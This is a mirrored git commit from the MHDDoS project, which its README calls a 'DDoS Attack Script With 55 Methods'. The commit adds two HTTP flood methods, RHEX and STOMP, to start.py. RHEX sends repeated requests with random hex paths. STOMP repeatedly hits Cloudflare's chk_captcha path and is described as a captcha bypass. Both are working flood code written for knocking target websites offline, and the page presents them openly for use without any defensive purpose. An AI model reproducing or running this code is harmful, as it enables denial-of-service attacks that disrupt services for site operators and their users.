mirror of
https://github.com/MatrixTM/MHDDoS.git
synced 2024-11-16 03:32:32 +08:00
Added 2 Methods (RHEX, STOMP)
This commit is contained in:
parent
c2e8eb5e25
commit
6e5ef49278
|
@ -1,6 +1,6 @@
|
|||
<p align="center"><img src="https://cdn.discordapp.com/attachments/938175699326484490/948263435412598864/unknown_2.png" width="400px" height="150px" alt="ddos"></p>
|
||||
|
||||
<h1 align="center">MHDDoS - DDoS Attack Script With 53 Methods</h1>
|
||||
<h1 align="center">MHDDoS - DDoS Attack Script With 55 Methods</h1>
|
||||
<em><h5 align="center">(Programming Language - Python 3)</h5></em>
|
||||
|
||||
<p align="center">
|
||||
|
@ -22,6 +22,8 @@
|
|||
* <img src="https://img.icons8.com/cotton/344/domain.png" width="16" height="16" alt="get"> GET | GET Flood
|
||||
* <img src="https://cdn0.iconfinder.com/data/icons/database-storage-5/60/server__database__fire__burn__safety-512.png" width="16" height="16" alt="post"> POST | POST Flood
|
||||
* <img src="https://upload.wikimedia.org/wikipedia/en/thumb/f/f9/OVH_Logo.svg/1200px-OVH_Logo.svg.png" width="16" height="16" alt="ovh"> OVH | Bypass OVH
|
||||
* <img src="https://cdn-icons-png.flaticon.com/512/1691/1691948.png" width="16" height="16" alt="ovh"> RHEX | Random HEX
|
||||
* <img src="https://cdn-icons-png.flaticon.com/512/4337/4337972.png" width="16" height="16" alt="ovh"> STOMP | Bypass chk_captcha
|
||||
* <img src="https://cdn.iconscout.com/icon/premium/png-256-thumb/cyber-bullying-2557797-2152371.png" width="16" height="16" alt="stress"> STRESS | Send HTTP Packet With High Byte
|
||||
* <img src="https://pbs.twimg.com/profile_images/1351562987224641544/IKb4q_yd_400x400.jpg" width="16" height="16" alt="dyn"> DYN | A New Method With Random SubDomain
|
||||
* <img src="https://cdn-icons-png.flaticon.com/512/6991/6991643.png" width="16" height="16" alt="downloader"> DOWNLOADER | A New Method of Reading data slowly
|
||||
|
|
96
start.py
96
start.py
|
@ -9,6 +9,7 @@ from math import log2, trunc
|
|||
from multiprocessing import RawValue
|
||||
from os import urandom as randbytes
|
||||
from pathlib import Path
|
||||
from re import compile
|
||||
from secrets import choice as randchoice
|
||||
from socket import (AF_INET, IP_HDRINCL, IPPROTO_IP, IPPROTO_TCP, IPPROTO_UDP, SOCK_DGRAM,
|
||||
SOCK_RAW, SOCK_STREAM, TCP_NODELAY, gethostbyname,
|
||||
|
@ -34,8 +35,6 @@ from impacket.ImpactPacket import IP, TCP, UDP, Data
|
|||
from psutil import cpu_percent, net_io_counters, process_iter, virtual_memory
|
||||
from requests import Response, Session, exceptions, get, cookies
|
||||
from yarl import URL
|
||||
from re import compile
|
||||
|
||||
|
||||
basicConfig(format='[%(asctime)s - %(levelname)s] %(message)s',
|
||||
datefmt="%H:%M:%S")
|
||||
|
@ -50,7 +49,6 @@ __dir__: Path = Path(__file__).parent
|
|||
__ip__: Any = None
|
||||
tor2webs = ['onion.ly', 'tor2web.to', 'onion.org', 'onion.pet', 'onion.ws', 'onion.top', 'onion.dog']
|
||||
|
||||
|
||||
with open(__dir__ / "config.json") as f:
|
||||
con = load(f)
|
||||
|
||||
|
@ -71,7 +69,6 @@ class bcolors:
|
|||
UNDERLINE = '\033[4m'
|
||||
|
||||
|
||||
|
||||
def exit(*message):
|
||||
if message:
|
||||
logger.error(bcolors.FAIL + " ".join(message) + bcolors.RESET)
|
||||
|
@ -83,16 +80,14 @@ class Methods:
|
|||
LAYER7_METHODS: Set[str] = {
|
||||
"CFB", "BYPASS", "GET", "POST", "OVH", "STRESS", "DYN", "SLOW", "HEAD",
|
||||
"NULL", "COOKIE", "PPS", "EVEN", "GSB", "DGB", "AVB", "CFBUAM",
|
||||
"APACHE", "XMLRPC", "BOT", "BOMB", "DOWNLOADER", "KILLER", "TOR"
|
||||
"APACHE", "XMLRPC", "BOT", "BOMB", "DOWNLOADER", "KILLER", "TOR", "RHEX", "STOMP"
|
||||
}
|
||||
|
||||
|
||||
LAYER4_AMP: Set[str] = {
|
||||
"MEM", "NTP", "DNS", "ARD",
|
||||
"CLDAP", "CHAR", "RDP"
|
||||
}
|
||||
|
||||
|
||||
LAYER4_METHODS: Set[str] = {*LAYER4_AMP,
|
||||
"TCP", "UDP", "SYN", "VSE", "MINECRAFT",
|
||||
"MCBOT", "CONNECTION", "CPS", "FIVEM", "TS3", "MCPE"
|
||||
|
@ -168,7 +163,7 @@ class Tools:
|
|||
|
||||
@staticmethod
|
||||
def randchr(lengh: int) -> str:
|
||||
return str(ProxyTools.Tools.rand_char(lengh)).strip()
|
||||
return str(ProxyTools.Random.rand_char(lengh)).strip()
|
||||
|
||||
@staticmethod
|
||||
def send(sock: socket, packet: bytes):
|
||||
|
@ -679,7 +674,7 @@ class HttpFlood(Thread):
|
|||
def getMethodType(method: str) -> str:
|
||||
return "GET" if {method.upper()} & {"CFB", "CFBUAM", "GET", "TOR", "COOKIE", "OVH", "EVEN",
|
||||
"DYN", "SLOW", "PPS", "APACHE",
|
||||
"BOT", } \
|
||||
"BOT", "RHEX", "STOMP"} \
|
||||
else "POST" if {method.upper()} & {"POST", "XMLRPC", "STRESS"} \
|
||||
else "HEAD" if {method.upper()} & {"GSB", "HEAD"} \
|
||||
else "REQUESTS"
|
||||
|
@ -867,7 +862,6 @@ class HttpFlood(Thread):
|
|||
Tools.send(s, payload)
|
||||
Tools.safe_close(s)
|
||||
|
||||
|
||||
def DGB(self):
|
||||
global REQUESTS_SENT, BYTES_SEND
|
||||
with suppress(Exception):
|
||||
|
@ -893,8 +887,6 @@ class HttpFlood(Thread):
|
|||
|
||||
Tools.safe_close(ss)
|
||||
|
||||
|
||||
|
||||
def DYN(self):
|
||||
payload: Any = str.encode(self._payload +
|
||||
f"Host: {ProxyTools.Random.rand_str(6)}.{self._target.authority}\r\n" +
|
||||
|
@ -964,6 +956,69 @@ class HttpFlood(Thread):
|
|||
Tools.send(s, payload)
|
||||
Tools.safe_close(s)
|
||||
|
||||
def RHEX(self):
|
||||
randhex = str(randbytes(randchoice([32, 64, 128])))
|
||||
payload = str.encode("%s %s/%s HTTP/1.1\r\n" % (self._req_type,
|
||||
self._target.authority,
|
||||
randhex) +
|
||||
"Host: %s/%s\r\n" % (self._target.authority, randhex) +
|
||||
self.randHeadercontent +
|
||||
'Accept-Encoding: gzip, deflate, br\r\n'
|
||||
'Accept-Language: en-US,en;q=0.9\r\n'
|
||||
'Cache-Control: max-age=0\r\n'
|
||||
'Connection: keep-alive\r\n'
|
||||
'Sec-Fetch-Dest: document\r\n'
|
||||
'Sec-Fetch-Mode: navigate\r\n'
|
||||
'Sec-Fetch-Site: none\r\n'
|
||||
'Sec-Fetch-User: ?1\r\n'
|
||||
'Sec-Gpc: 1\r\n'
|
||||
'Pragma: no-cache\r\n'
|
||||
'Upgrade-Insecure-Requests: 1\r\n\r\n')
|
||||
s = None
|
||||
with suppress(Exception), self.open_connection() as s:
|
||||
for _ in range(self._rpc):
|
||||
Tools.send(s, payload)
|
||||
Tools.safe_close(s)
|
||||
|
||||
def STOMP(self):
|
||||
dep = ('Accept-Encoding: gzip, deflate, br\r\n'
|
||||
'Accept-Language: en-US,en;q=0.9\r\n'
|
||||
'Cache-Control: max-age=0\r\n'
|
||||
'Connection: keep-alive\r\n'
|
||||
'Sec-Fetch-Dest: document\r\n'
|
||||
'Sec-Fetch-Mode: navigate\r\n'
|
||||
'Sec-Fetch-Site: none\r\n'
|
||||
'Sec-Fetch-User: ?1\r\n'
|
||||
'Sec-Gpc: 1\r\n'
|
||||
'Pragma: no-cache\r\n'
|
||||
'Upgrade-Insecure-Requests: 1\r\n\r\n')
|
||||
hexh = r'\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87' \
|
||||
r'\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F' \
|
||||
r'\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F' \
|
||||
r'\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84' \
|
||||
r'\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F' \
|
||||
r'\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98' \
|
||||
r'\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98' \
|
||||
r'\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B' \
|
||||
r'\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99' \
|
||||
r'\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C' \
|
||||
r'\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA '
|
||||
p1, p2 = str.encode("%s %s/%s HTTP/1.1\r\n" % (self._req_type,
|
||||
self._target.authority,
|
||||
hexh) +
|
||||
"Host: %s/%s\r\n" % (self._target.authority, hexh) +
|
||||
self.randHeadercontent + dep), str.encode(
|
||||
"%s %s/cdn-cgi/l/chk_captcha HTTP/1.1\r\n" % (self._req_type,
|
||||
self._target.authority) +
|
||||
"Host: %s\r\n" % hexh +
|
||||
self.randHeadercontent + dep)
|
||||
s = None
|
||||
with suppress(Exception), self.open_connection() as s:
|
||||
Tools.send(s, p1)
|
||||
for _ in range(self._rpc):
|
||||
Tools.send(s, p2)
|
||||
Tools.safe_close(s)
|
||||
|
||||
def NULL(self) -> None:
|
||||
payload: Any = str.encode(self._payload +
|
||||
f"Host: {self._target.authority}\r\n" +
|
||||
|
@ -1047,6 +1102,10 @@ class HttpFlood(Thread):
|
|||
self.SENT_FLOOD = self.SLOW
|
||||
if name == "GSB":
|
||||
self.SENT_FLOOD = self.GSB
|
||||
if name == "RHEX":
|
||||
self.SENT_FLOOD = self.RHEX
|
||||
if name == "STOMP":
|
||||
self.SENT_FLOOD = self.STOMP
|
||||
if name == "NULL":
|
||||
self.SENT_FLOOD = self.NULL
|
||||
if name == "COOKIE":
|
||||
|
@ -1072,7 +1131,9 @@ class ProxyManager:
|
|||
provider for provider in cf["proxy-providers"]
|
||||
if provider["type"] == Proxy_type or Proxy_type == 0
|
||||
]
|
||||
logger.info(f"{bcolors.WARNING}Downloading Proxies from {bcolors.OKBLUE}%d{bcolors.WARNING} Providers{bcolors.RESET}" % len(providrs))
|
||||
logger.info(
|
||||
f"{bcolors.WARNING}Downloading Proxies from {bcolors.OKBLUE}%d{bcolors.WARNING} Providers{bcolors.RESET}" % len(
|
||||
providrs))
|
||||
proxes: Set[Proxy] = set()
|
||||
|
||||
with ThreadPoolExecutor(len(providrs)) as executor:
|
||||
|
@ -1368,7 +1429,8 @@ def handleProxyList(con, proxy_li, proxy_ty, url=None):
|
|||
if proxy_ty == 6:
|
||||
proxy_ty = randchoice([4, 5, 1])
|
||||
if not proxy_li.exists():
|
||||
logger.warning(f"{bcolors.WARNING}The file doesn't exist, creating files and downloading proxies.{bcolors.RESET}")
|
||||
logger.warning(
|
||||
f"{bcolors.WARNING}The file doesn't exist, creating files and downloading proxies.{bcolors.RESET}")
|
||||
proxy_li.parent.mkdir(parents=True, exist_ok=True)
|
||||
with proxy_li.open("w") as wr:
|
||||
Proxies: Set[Proxy] = ProxyManager.DownloadFromConfig(con, proxy_ty)
|
||||
|
@ -1428,7 +1490,6 @@ if __name__ == '__main__':
|
|||
exit("Method Not Found %s" %
|
||||
", ".join(Methods.ALL_METHODS))
|
||||
|
||||
|
||||
if method in Methods.LAYER7_METHODS:
|
||||
url = URL(urlraw)
|
||||
host = url.host
|
||||
|
@ -1518,7 +1579,7 @@ if __name__ == '__main__':
|
|||
port = 80
|
||||
|
||||
if method == "SYN":
|
||||
__ip__ = getMyIPAddress()
|
||||
__ip__ = __ip__
|
||||
|
||||
if len(argv) >= 6:
|
||||
argfive = argv[5].strip()
|
||||
|
@ -1554,7 +1615,8 @@ if __name__ == '__main__':
|
|||
event.set()
|
||||
ts = time()
|
||||
while time() < ts + timer:
|
||||
logger.debug(f'{bcolors.WARNING}Target:{bcolors.OKBLUE} %s,{bcolors.WARNING} Port:{bcolors.OKBLUE} %s,{bcolors.WARNING} Method:{bcolors.OKBLUE} %s{bcolors.WARNING} PPS:{bcolors.OKBLUE} %s,{bcolors.WARNING} BPS:{bcolors.OKBLUE} %s / %d%%{bcolors.RESET}' %
|
||||
logger.debug(
|
||||
f'{bcolors.WARNING}Target:{bcolors.OKBLUE} %s,{bcolors.WARNING} Port:{bcolors.OKBLUE} %s,{bcolors.WARNING} Method:{bcolors.OKBLUE} %s{bcolors.WARNING} PPS:{bcolors.OKBLUE} %s,{bcolors.WARNING} BPS:{bcolors.OKBLUE} %s / %d%%{bcolors.RESET}' %
|
||||
(target or url.host,
|
||||
port or (url.port or 80),
|
||||
method,
|
||||
|
|
Loading…
Reference in New Issue
Block a user